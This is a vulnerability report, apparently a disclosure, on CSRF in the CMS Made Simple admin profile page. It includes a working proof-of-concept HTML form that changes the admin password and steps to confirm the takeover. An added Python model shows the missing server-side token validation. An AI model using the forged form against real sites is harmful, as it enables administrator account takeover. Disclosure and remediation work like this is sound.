Summary:
CSRF in the admin profile page allows full admin account takeover
Detailed Description:
When an admin changes their profile information, the following POST request
is sent:
POST /cmsms/admin/myaccount.php?_sk_=SKVAL HTTP/1.1
Host: HOST
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/
Cookie: [removed]
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 131
active_tab=maintab&submit_account=Submit&user=admin&password=&passwordagain=&firstname=cccc&lastname=sss&email=test@testhost.com
The problem is that the _sk_ value, which serves as the CSRF token, is not
validated on the server. An attacker can therefore craft a POST request that is
submitted automatically whenever an administrator is lured into opening a page
under the attacker's control. The following HTML is an example that reproduces
the issue:
<form action="http://localhost/cmsms/admin/myaccount.php" method="POST">
  <input type="hidden" name="user" value="admin">
  <input type="hidden" name="password" value="csrf1234">
  <input type="hidden" name="passwordagain" value="csrf1234">
  <input type="hidden" name="active_tab" value="maintab">
  <input type="hidden" name="submit_account" value="Submit">
  <input type="submit" value="CSRF!">
</form>
Paste the above markup into an HTML file, open it in a browser while logged in
with the admin account, and click "CSRF!". Log out of the admin account and then
log in with the password "csrf1234" to confirm the attack worked.
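The following is an added illustration of the server-side check that the report says myaccount.php lacks; it is not CMS Made Simple code. The handler, the session object, and the two request bodies (one copied from the legitimate request above, one equivalent to what the PoC form submits) are constructed for this example. The token in the legitimate request is compared against the per-session value with a constant-time comparison, and a request that carries no _sk_ at all, as the PoC form does, is rejected before any profile field is touched.

```python
"""Model of the missing _sk_ validation. Added example, not project code:
AdminSession, myaccount_handler and the sample bodies are constructed here."""
import hmac
import secrets
from urllib.parse import parse_qsl, urlsplit

# Constructed body, copied from the legitimate request in the report.
LEGIT_BODY = ("active_tab=maintab&submit_account=Submit&user=admin&password="
              "&passwordagain=&firstname=cccc&lastname=sss&email=test@testhost.com")
# Constructed body equivalent to what the PoC form submits. Note: no _sk_ anywhere.
FORGED_BODY = ("user=admin&password=csrf1234&passwordagain=csrf1234"
               "&active_tab=maintab&submit_account=Submit")


class AdminSession:
    """Stands in for the logged-in admin's server-side session (constructed)."""

    def __init__(self, user):
        self.user = user
        self.password = "original-secret"  # constructed starting value
        # Per-session secret; the legitimate UI embeds it as ?_sk_=... in the URL.
        self.sk = secrets.token_hex(16)


def parse_request(url, body):
    """Split the URL query string and the urlencoded body into dicts."""
    query = dict(parse_qsl(urlsplit(url).query, keep_blank_values=True))
    form = dict(parse_qsl(body, keep_blank_values=True))
    return query, form


def myaccount_handler(session, url, body):
    """Hypothetical profile-update handler: the token check runs first."""
    query, form = parse_request(url, body)
    supplied = query.get("_sk_")
    # Reject when the token is absent (the PoC form never sends one) or wrong.
    # hmac.compare_digest keeps the comparison constant-time.
    if supplied is None or not hmac.compare_digest(
            supplied.encode("utf-8"), session.sk.encode("utf-8")):
        return {"status": 403, "reason": "missing or invalid _sk_"}
    if form.get("user") != session.user:
        return {"status": 403, "reason": "user does not match session"}
    new_pw = form.get("password", "")
    if new_pw:
        if new_pw != form.get("passwordagain", ""):
            return {"status": 400, "reason": "passwords differ"}
        session.password = new_pw
    return {"status": 200, "password_changed": bool(new_pw)}


def run_scenarios():
    """Legitimate request, forged request without a token, forged request with a guess."""
    s = AdminSession("admin")
    base = "http://localhost/cmsms/admin/myaccount.php"
    return {
        "legit": myaccount_handler(s, f"{base}?_sk_={s.sk}", LEGIT_BODY)["status"],
        "forged_no_token": myaccount_handler(s, base, FORGED_BODY)["status"],
        "forged_guessed_token": myaccount_handler(s, f"{base}?_sk_=SKVAL", FORGED_BODY)["status"],
        "password_after": s.password,
    }


if __name__ == "__main__":
    for name, value in run_scenarios().items():
        print(f"{name}: {value}")
```

The same FORGED_BODY succeeds only when it is paired with the session's real token, which shows that the form contents are not what distinguishes a legitimate update from a forged one; the token check is. Marking the admin session cookie SameSite=Lax or Strict is a useful second layer, but it does not replace validating the token on the server.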
Regards,